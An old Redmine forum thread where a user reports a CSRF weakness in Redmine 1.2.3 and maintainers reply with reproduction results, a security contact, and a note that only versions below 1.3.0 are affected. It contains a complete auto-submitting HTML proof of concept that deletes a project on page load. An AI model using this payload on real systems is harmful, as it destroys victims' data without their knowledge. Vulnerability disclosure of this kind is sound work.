Forums » Open discussion »
Redmine is still vulnerable against CSRF
Added by Peter Panther over 12 years ago
It seems that Redmine is still vulnerable against CSRF.
Scenario:
- user is logged in at the redmine server
- user follows a link that executes the following HTML Code
- the project "deleteme" will be deleted automatically and the user will be logged out.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>CRSF Demonstration</title>
</head>
<body onload="javascript:fireForms()">
<script language="JavaScript">
function fireForms()
{
document.forms[0].submit();
}
</script>
<H2>CRSF Demonstration</H2>
<form method="POST" name="form0" action="https://<server>/redmine/projects/deleteme">
<input type="hidden" name="_method" value="delete"/>
<input type="hidden" name="confirm" value="1"/>
<input type="hidden" name="commit" value="Delete"/>
</form>
</body>
</html>
I thought that this problem was fixed with rails 2.3.11 and CVE-2011-0447?
I'm using
- Rails 2.3.11
- Redmine 1.2.3.stable.8195 (MySQL)
Any ideas?
Thanks for reporting this. However, we were unable to reproduce this with:
- Redmine 1.2.3.stable.8195 (MySQL)
- both Rails 2.3.11 and Rails 2.3.14
If you believe we missed something, please get in touch via security@redmine.org and we'll discuss it off the record until we can determine if it's an actual vulnerability and commit a fix.
Thanks!
This issue affects Redmine < 1.3.0 only.
RE: Redmine is still vulnerable against CSRF
-
Added by Jan from Planio www.plan.io over 12 years ago
RE: Redmine is still vulnerable against CSRF
-
Added by Jean-Philippe Lang over 12 years ago